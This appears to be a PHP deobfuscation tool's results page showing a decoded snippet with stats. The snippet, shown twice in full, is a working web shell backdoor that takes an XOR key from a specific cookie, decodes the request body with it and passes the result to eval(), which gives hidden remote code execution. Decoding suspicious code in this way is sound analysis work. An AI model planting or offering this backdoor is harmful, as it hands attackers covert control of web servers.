Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $auth = "21a27be0cd332f0e8430e24da7158a96";if (isset($_COOKIE[$auth])) {$key = str_r..
Decoded Output download
<?php $auth = "21a27be0cd332f0e8430e24da7158a96";if (isset($_COOKIE[$auth])) {$key = str_rot13($_COOKIE[$auth]);$res = "";foreach (str_split(@file_get_contents('php://input'), strlen($key)) as $part) {$res .= $part ^ $key;}eval($res);} ?>
Did this file decode correctly?
Original Code
<?php $auth = "21a27be0cd332f0e8430e24da7158a96";if (isset($_COOKIE[$auth])) {$key = str_rot13($_COOKIE[$auth]);$res = "";foreach (str_split(@file_get_contents('php://input'), strlen($key)) as $part) {$res .= $part ^ $key;}eval($res);}
Function Calls
str_rot13 | 1 |
Stats
MD5 | 446abefa504998f144a7ae906a173978 |
Eval Count | 0 |
Decode Time | 201 ms |